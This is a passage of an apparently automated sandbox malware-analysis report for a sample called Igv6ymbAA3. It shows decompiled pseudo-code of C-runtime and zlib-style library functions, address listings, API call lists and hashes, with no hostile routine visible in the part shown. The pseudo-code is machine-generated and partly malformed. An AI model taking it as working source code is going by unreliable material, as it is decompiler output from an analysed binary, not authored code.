											 *_t147 = 0xdddd;
											_t147 =  &(_t147[4]);
											__eflags = _t147;
										}
										_t184 = _t147;
										goto L45;
									}
									E0040CFB0(_t146);
									_t184 = _t189;
									__eflags = _t184;
									if(_t184 == 0) {
										goto L52;
									}
									 *_t184 = 0xcccc;
									_t184 =  &(_t184[4]);
									goto L45;
								}
								if(_a24 != 0 && _t174 <= _a24) {
									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
								}
								goto L52;
							}
							_t150 = 0xffffffe0;
							_t179 = _t150 % _t182;
							if(_t150 / _t182 < 2) {
								goto L28;
							}
							_t25 = _t182 + 8; // 0x8
							_t152 = _t182 + _t25;
							if(_t182 + _t25 > 0x400) {
								_t153 = E0040B84D(0, _t179, _t182, _t152);
								__eflags = _t153;
								if(_t153 == 0) {
									L27:
									_v16 = _t153;
									goto L29;
								}
								 *_t153 = 0xdddd;
								L26:
								_t153 =  &(_t153[4]);
								goto L27;
							}
							E0040CFB0(_t152);
							_t153 = _t189;
							if(_t153 == 0) {
								goto L27;
							}
							 *_t153 = 0xcccc;
							goto L26;
						}
					}
				}
				_t178 = _a16;
				_t157 = _a12;
				while(1) {
					_t178 = _t178 - 1;
					if( *_t157 == 0) {
						break;
					}
					_t157 =  &(_t157[1]);
					if(_t178 != 0) {
						continue;
					}
					_t178 = _t178 | 0xffffffff;
					break;
				}
				_t160 = _a16 - _t178 - 1;
				if(_t160 < _a16) {
					_t160 = _t160 + 1;
				}
				_a16 = _t160;
				goto L13;
			}











































                                                                                                                                                                      0x00417089
                                                                                                                                                                      0x00417090
                                                                                                                                                                      0x00417098
                                                                                                                                                                      0x0041709a
                                                                                                                                                                      0x004170a0
                                                                                                                                                                      0x004170a6
                                                                                                                                                                      0x004170bb
                                                                                                                                                                      0x004170c5
                                                                                                                                                                      0x004170cb
                                                                                                                                                                      0x004170ce
                                                                                                                                                                      0x004170d0
                                                                                                                                                                      0x004170d0
                                                                                                                                                                      0x004170bd
                                                                                                                                                                      0x004170bd
                                                                                                                                                                      0x004170bd
                                                                                                                                                                      0x004170bb
                                                                                                                                                                      0x004170dd
                                                                                                                                                                      0x00417101
                                                                                                                                                                      0x00417101
                                                                                                                                                                      0x00417109
                                                                                                                                                                      0x004172bb
                                                                                                                                                                      0x004172be
                                                                                                                                                                      0x004172c1
                                                                                                                                                                      0x004172c4
                                                                                                                                                                      0x004172cb
                                                                                                                                                                      0x004172cb
                                                                                                                                                                      0x004172ce
                                                                                                                                                                      0x004172d1
                                                                                                                                                                      0x004172d8
                                                                                                                                                                      0x004172d8
                                                                                                                                                                      0x004172de
                                                                                                                                                                      0x004172e4
                                                                                                                                                                      0x004172e7
                                                                                                                                                                      0x004172ea
                                                                                                                                                                      0x004172f3
                                                                                                                                                                      0x004172f6
                                                                                                                                                                      0x004173ef
                                                                                                                                                                      0x004173f1
                                                                                                                                                                      0x004173f1
                                                                                                                                                                      0x004173f4
                                                                                                                                                                      0x004173f6
                                                                                                                                                                      0x004173f9
                                                                                                                                                                      0x004173fe
                                                                                                                                                                      0x004173ff
                                                                                                                                                                      0x00417402
                                                                                                                                                                      0x00417404
                                                                                                                                                                      0x00417406
                                                                                                                                                                      0x00417409
                                                                                                                                                                      0x0041740b
                                                                                                                                                                      0x0041740c
                                                                                                                                                                      0x00417411
                                                                                                                                                                      0x00417409
                                                                                                                                                                      0x00417412
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417412
                                                                                                                                                                      0x00417309
                                                                                                                                                                      0x0041730e
                                                                                                                                                                      0x00417311
                                                                                                                                                                      0x00417314
                                                                                                                                                                      0x00417316
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041732a
                                                                                                                                                                      0x0041732c
                                                                                                                                                                      0x0041732f
                                                                                                                                                                      0x00417331
                                                                                                                                                                      0x0041733a
                                                                                                                                                                      0x00417379
                                                                                                                                                                      0x00417379
                                                                                                                                                                      0x00417379
                                                                                                                                                                      0x0041737b
                                                                                                                                                                      0x0041737b
                                                                                                                                                                      0x0041737d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417384
                                                                                                                                                                      0x0041739c
                                                                                                                                                                      0x0041739e
                                                                                                                                                                      0x004173a1
                                                                                                                                                                      0x004173a3
                                                                                                                                                                      0x004173bf
                                                                                                                                                                      0x004173c1
                                                                                                                                                                      0x004173c9
                                                                                                                                                                      0x004173cb
                                                                                                                                                                      0x004173cb
                                                                                                                                                                      0x004173a5
                                                                                                                                                                      0x004173a5
                                                                                                                                                                      0x004173a5
                                                                                                                                                                      0x004173cf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004173d4
                                                                                                                                                                      0x0041733c
                                                                                                                                                                      0x0041733f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417341
                                                                                                                                                                      0x00417344
                                                                                                                                                                      0x00417349
                                                                                                                                                                      0x00417362
                                                                                                                                                                      0x00417368
                                                                                                                                                                      0x0041736a
                                                                                                                                                                      0x0041736c
                                                                                                                                                                      0x00417372
                                                                                                                                                                      0x00417372
                                                                                                                                                                      0x00417372
                                                                                                                                                                      0x00417375
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417375
                                                                                                                                                                      0x0041734b
                                                                                                                                                                      0x00417350
                                                                                                                                                                      0x00417352
                                                                                                                                                                      0x00417354
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417356
                                                                                                                                                                      0x0041735c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041735c
                                                                                                                                                                      0x00417333
                                                                                                                                                                      0x00417333
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417117
                                                                                                                                                                      0x0041711a
                                                                                                                                                                      0x004172ec
                                                                                                                                                                      0x004172ec
                                                                                                                                                                      0x00417414
                                                                                                                                                                      0x00417425
                                                                                                                                                                      0x00417425
                                                                                                                                                                      0x00417120
                                                                                                                                                                      0x00417126
                                                                                                                                                                      0x0041712d
                                                                                                                                                                      0x0041712d
                                                                                                                                                                      0x00417130
                                                                                                                                                                      0x00417153
                                                                                                                                                                      0x00417155
                                                                                                                                                                      0x00417157
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041715d
                                                                                                                                                                      0x0041715d
                                                                                                                                                                      0x004171a2
                                                                                                                                                                      0x004171a2
                                                                                                                                                                      0x004171a5
                                                                                                                                                                      0x004171a8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004171c1
                                                                                                                                                                      0x004172aa
                                                                                                                                                                      0x004172ad
                                                                                                                                                                      0x004172b2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004172b5
                                                                                                                                                                      0x004171c7
                                                                                                                                                                      0x004171db
                                                                                                                                                                      0x004171dd
                                                                                                                                                                      0x004171e2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004171ef
                                                                                                                                                                      0x0041721a
                                                                                                                                                                      0x0041721c
                                                                                                                                                                      0x00417263
                                                                                                                                                                      0x00417263
                                                                                                                                                                      0x00417263
                                                                                                                                                                      0x00417265
                                                                                                                                                                      0x00417265
                                                                                                                                                                      0x00417267
                                                                                                                                                                      0x00417277
                                                                                                                                                                      0x0041727d
                                                                                                                                                                      0x0041727f
                                                                                                                                                                      0x00417281
                                                                                                                                                                      0x00417282
                                                                                                                                                                      0x00417283
                                                                                                                                                                      0x00417286
                                                                                                                                                                      0x0041728c
                                                                                                                                                                      0x0041728f
                                                                                                                                                                      0x00417288
                                                                                                                                                                      0x00417288
                                                                                                                                                                      0x00417289
                                                                                                                                                                      0x00417289
                                                                                                                                                                      0x004172a0
                                                                                                                                                                      0x004172a0
                                                                                                                                                                      0x004172a4
                                                                                                                                                                      0x004172a9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417267
                                                                                                                                                                      0x00417222
                                                                                                                                                                      0x00417223
                                                                                                                                                                      0x00417225
                                                                                                                                                                      0x00417228
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041722a
                                                                                                                                                                      0x0041722a
                                                                                                                                                                      0x0041722e
                                                                                                                                                                      0x00417233
                                                                                                                                                                      0x0041724c
                                                                                                                                                                      0x00417252
                                                                                                                                                                      0x00417254
                                                                                                                                                                      0x00417256
                                                                                                                                                                      0x0041725c
                                                                                                                                                                      0x0041725c
                                                                                                                                                                      0x0041725c
                                                                                                                                                                      0x0041725f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041725f
                                                                                                                                                                      0x00417235
                                                                                                                                                                      0x0041723a
                                                                                                                                                                      0x0041723c
                                                                                                                                                                      0x0041723e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417240
                                                                                                                                                                      0x00417246
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417246
                                                                                                                                                                      0x004171f4
                                                                                                                                                                      0x00417213
                                                                                                                                                                      0x00417213
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004171f4
                                                                                                                                                                      0x00417163
                                                                                                                                                                      0x00417164
                                                                                                                                                                      0x00417169
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041716b
                                                                                                                                                                      0x0041716b
                                                                                                                                                                      0x00417174
                                                                                                                                                                      0x0041718a
                                                                                                                                                                      0x00417190
                                                                                                                                                                      0x00417192
                                                                                                                                                                      0x0041719d
                                                                                                                                                                      0x0041719d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041719d
                                                                                                                                                                      0x00417194
                                                                                                                                                                      0x0041719a
                                                                                                                                                                      0x0041719a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0041719a
                                                                                                                                                                      0x00417176
                                                                                                                                                                      0x0041717b
                                                                                                                                                                      0x0041717f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417181
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00417181
                                                                                                                                                                      0x00417157
                                                                                                                                                                      0x00417109
                                                                                                                                                                      0x004170df
                                                                                                                                                                      0x004170e2
                                                                                                                                                                      0x004170e5
                                                                                                                                                                      0x004170e5
                                                                                                                                                                      0x004170e8
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004170ea
                                                                                                                                                                      0x004170ed
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004170ef
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004170ef
                                                                                                                                                                      0x004170f7
                                                                                                                                                                      0x004170fb
                                                                                                                                                                      0x004170fd
                                                                                                                                                                      0x004170fd
                                                                                                                                                                      0x004170fe
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02741868), ref: 004170C5
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.400990974.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                                                      • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                      • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 024272E8 Relevance: 22.8, APIs: 15, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 0242731A
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 0242732C
                                                                                                                                                                      • _malloc.LIBCMT ref: 024273F1
                                                                                                                                                                      • _malloc.LIBCMT ref: 024274B3
                                                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 024274DE
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02427501
                                                                                                                                                                      • __freea.LIBCMT ref: 0242750B
                                                                                                                                                                      • __freea.LIBCMT ref: 02427514
                                                                                                                                                                      • ___ansicp.LIBCMT ref: 02427545
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 02427570
                                                                                                                                                                      • _malloc.LIBCMT ref: 024275C9
                                                                                                                                                                      • _memset.LIBCMT ref: 024275EB
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 02427621
                                                                                                                                                                      • __freea.LIBCMT ref: 02427636
                                                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02427650
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2918745354-0
                                                                                                                                                                      • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                      • Instruction ID: 147d6c9fb572a684226e5c8ba2c05f1c1e5d253a27f70ae9553a761fd91d7f53
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                      • Instruction Fuzzy Hash: 17B1A372900129EFDF119FA6CC809AFBFBAEB08358B94456BF915A7210D731C999CF50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0242083C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02420977,00000000,00000000,?,00000001,0241C22D,0241B993), ref: 0242084E
                                                                                                                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 02420859
                                                                                                                                                                        • Part of subcall function 0241E9D1: Sleep.KERNEL32(000003E8,00000000,?,0242079F,KERNEL32.DLL,?,024207EB,?,00000001,0241C22D,0241B993), ref: 0241E9DD
                                                                                                                                                                        • Part of subcall function 0241E9D1: GetModuleHandleW.KERNEL32(00000001,?,0242079F,KERNEL32.DLL,?,024207EB,?,00000001,0241C22D,0241B993), ref: 0241E9E6
                                                                                                                                                                      • __lock.LIBCMT ref: 024208B4
                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 024208C1
                                                                                                                                                                      • __lock.LIBCMT ref: 024208D5
                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 024208F3
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, Offset: 02410000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2410000_Igv6ymbAA3.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                      • String ID: @.B$KERNEL32.DLL
                                                                                                                                                                      • API String ID: 4021795732-2520587274
                                                                                                                                                                      • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                      • Instruction ID: dde4ae5a9f2197b48712a195768f5bb616e9fc04e650f10b1aa2f6ebf55466c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E11A2B1A40711EED720AF36D900B8BBBE0AF14310F50452FD8A9A32A0CB7496468F98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                      			E004057B0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t57;
				char* _t60;
				char _t62;
				intOrPtr _t63;
				char _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				char* _t88;
				char* _t89;
				intOrPtr* _t91;
				intOrPtr* _t93;
				signed int _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;

				_t98 = _t97 | 0xffffffff;
				 *((intOrPtr*)(_t100 + 0xc)) = 0;
				_t91 = __eax;
				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
					__eflags = 0;
					return 0;
				} else {
					_t93 = E0040B84D(0, _t86, __eax, 0x74);
					_t101 = _t100 + 4;
					if(_t93 == 0) {
						L31:
						return 0;
					} else {
						 *((intOrPtr*)(_t93 + 0x20)) = 0;
						 *((intOrPtr*)(_t93 + 0x24)) = 0;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x44)) = 0;
						 *_t93 = 0;
						 *((intOrPtr*)(_t93 + 0x48)) = 0;
						 *((intOrPtr*)(_t93 + 0xc)) = 0;
						 *((intOrPtr*)(_t93 + 0x10)) = 0;
						 *((intOrPtr*)(_t93 + 4)) = 0;
						 *((intOrPtr*)(_t93 + 0x40)) = 0;
						 *((intOrPtr*)(_t93 + 0x38)) = 0;
						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
						 *((intOrPtr*)(_t93 + 0x64)) = 0;
						 *((intOrPtr*)(_t93 + 0x68)) = 0;
						 *(_t93 + 0x6c) = _t98;
						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
						_t57 =  *((intOrPtr*)(_t101 + 0x78));
						_t102 = _t101 + 0xc;
						 *((intOrPtr*)(_t93 + 0x50)) = 0;
						 *((intOrPtr*)(_t93 + 0x58)) = 0;
						_t87 = _t57 + 1;
						do {
							_t82 =  *_t57;
							_t57 = _t57 + 1;
						} while (_t82 != 0);
						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
						_t103 = _t102 + 4;
						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
						if(_t60 == 0) {
							L30:
							E00405160(0, _t87, _t93);
							goto L31;
						} else {
							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
							_t88 = _t60;
							goto L7;
							L9:
							L9:
							if( *_t91 == 0x72) {
								 *((char*)(_t93 + 0x5c)) = 0x72;
							}
							_t63 =  *_t91;
							if(_t63 == 0x77 || _t63 == 0x61) {
								 *((char*)(_t93 + 0x5c)) = 0x77;
							}
							_t64 =  *_t91;
							if(_t64 < 0x30 || _t64 > 0x39) {
								__eflags = _t64 - 0x66;
								if(_t64 != 0x66) {
									__eflags = _t64 - 0x68;
									if(_t64 != 0x68) {
										__eflags = _t64 - 0x52;
										if(_t64 != 0x52) {
											_t89 =  *((intOrPtr*)(_t103 + 0x14));
											 *_t89 = _t64;
											_t87 = _t89 + 1;
											__eflags = _t87;
											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
										} else {
											 *((intOrPtr*)(_t103 + 0x10)) = 3;
										}
									} else {
										 *((intOrPtr*)(_t103 + 0x10)) = 2;
									}
								} else {
									 *((intOrPtr*)(_t103 + 0x10)) = 1;
								}
							} else {
								_t98 = _t64 - 0x30;
							}
							_t91 = _t91 + 1;
							if(_t64 == 0) {
								goto L26;
							}
							_t87 = _t103 + 0x68;
							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
								goto L9;
							}
							L26:
							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
							if(_t65 == 0) {
								goto L30;
							} else {
								if(_t65 != 0x77) {
									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
									 *_t93 = _t66;
									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
									_t104 = _t103 + 0x14;
									__eflags = _t67;
									if(_t67 != 0) {
										goto L30;
									} else {
										__eflags =  *((intOrPtr*)(_t93 + 0x44));
										if(__eflags == 0) {
											goto L30;
										} else {
											goto L34;
										}
									}
								} else {
									_push(0x38);
									_push("1.2.3");
									_push( *((intOrPtr*)(_t103 + 0x10)));
									_push(8);
									_push(0xfffffff1);
									_push(8);
									_push(_t98);
									_push(_t93);
									_t91 = E00404CE0();
									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
									_t104 = _t103 + 0x24;
									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
									if(_t91 != 0 || _t79 == 0) {
										goto L30;
									} else {
										L34:
										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
										_t69 =  *((intOrPtr*)(_t104 + 0x70));
										__eflags = _t69;
										_push(_t104 + 0x18);
										if(__eflags >= 0) {
											_push(_t69);
											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
										} else {
											_t87 =  *((intOrPtr*)(_t104 + 0x70));
											_push( *((intOrPtr*)(_t104 + 0x70)));
											_t70 = E0040CB9D();
										}
										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
										__eflags = _t70;
										if(_t70 == 0) {
											goto L30;
										} else {
											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
											if( *((char*)(_t93 + 0x5c)) != 0x77) {
												E00405000(_t93, 0);
												_push( *((intOrPtr*)(_t93 + 0x40)));
												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
												__eflags = _t74;
												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
												return _t93;
											} else {
												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
												return _t93;
											}
										}
									}
								}
							}
							goto L42;
							L7:
							_t62 =  *_t83;
							 *_t88 = _t62;
							_t83 = _t83 + 1;
							_t88 = _t88 + 1;
							if(_t62 != 0) {
								goto L7;
							} else {
								 *((char*)(_t93 + 0x5c)) = 0;
							}
							goto L9;
						}
					}
				}
				L42:
			}

































                                                                                                                                                                      0x004057b7
                                                                                                                                                                      0x004057bf
                                                                                                                                                                      0x004057c3
                                                                                                                                                                      0x004057c5
                                                                                                                                                                      0x004057cd
                                                                                                                                                                      0x004059c8
                                                                                                                                                                      0x004059ce
                                                                                                                                                                      0x004057db
                                                                                                                                                                      0x004057e3
                                                                                                                                                                      0x004057e5
                                                                                                                                                                      0x004057ea
                                                                                                                                                                      0x00405921
                                                                                                                                                                      0x0040592a
                                                                                                                                                                      0x004057f0
                                                                                                                                                                      0x004057f3
                                                                                                                                                                      0x004057f6
                                                                                                                                                                      0x004057f9
                                                                                                                                                                      0x004057fc
                                                                                                                                                                      0x004057ff
                                                                                                                                                                      0x00405801
                                                                                                                                                                      0x00405804
                                                                                                                                                                      0x00405807
                                                                                                                                                                      0x0040580a
                                                                                                                                                                      0x0040580d
                                                                                                                                                                      0x00405810
                                                                                                                                                                      0x00405813
                                                                                                                                                                      0x00405816
                                                                                                                                                                      0x00405819
                                                                                                                                                                      0x0040581c
                                                                                                                                                                      0x00405824
                                                                                                                                                                      0x00405827
                                                                                                                                                                      0x0040582b
                                                                                                                                                                      0x0040582e
                                                                                                                                                                      0x00405831
                                                                                                                                                                      0x00405834
                                                                                                                                                                      0x00405837
                                                                                                                                                                      0x00405837
                                                                                                                                                                      0x00405839
                                                                                                                                                                      0x0040583a
                                                                                                                                                                      0x00405842
                                                                                                                                                                      0x00405847
                                                                                                                                                                      0x0040584a
                                                                                                                                                                      0x0040584f
                                                                                                                                                                      0x0040591c
                                                                                                                                                                      0x0040591c
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405855
                                                                                                                                                                      0x00405855
                                                                                                                                                                      0x00405859
                                                                                                                                                                      0x0040585b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405870
                                                                                                                                                                      0x00405872
                                                                                                                                                                      0x00405874
                                                                                                                                                                      0x00405874
                                                                                                                                                                      0x00405877
                                                                                                                                                                      0x0040587b
                                                                                                                                                                      0x00405881
                                                                                                                                                                      0x00405881
                                                                                                                                                                      0x00405885
                                                                                                                                                                      0x00405889
                                                                                                                                                                      0x00405897
                                                                                                                                                                      0x00405899
                                                                                                                                                                      0x004058a5
                                                                                                                                                                      0x004058a7
                                                                                                                                                                      0x004058b3
                                                                                                                                                                      0x004058b5
                                                                                                                                                                      0x004058c1
                                                                                                                                                                      0x004058c5
                                                                                                                                                                      0x004058c7
                                                                                                                                                                      0x004058c7
                                                                                                                                                                      0x004058c8
                                                                                                                                                                      0x004058b7
                                                                                                                                                                      0x004058b7
                                                                                                                                                                      0x004058b7
                                                                                                                                                                      0x004058a9
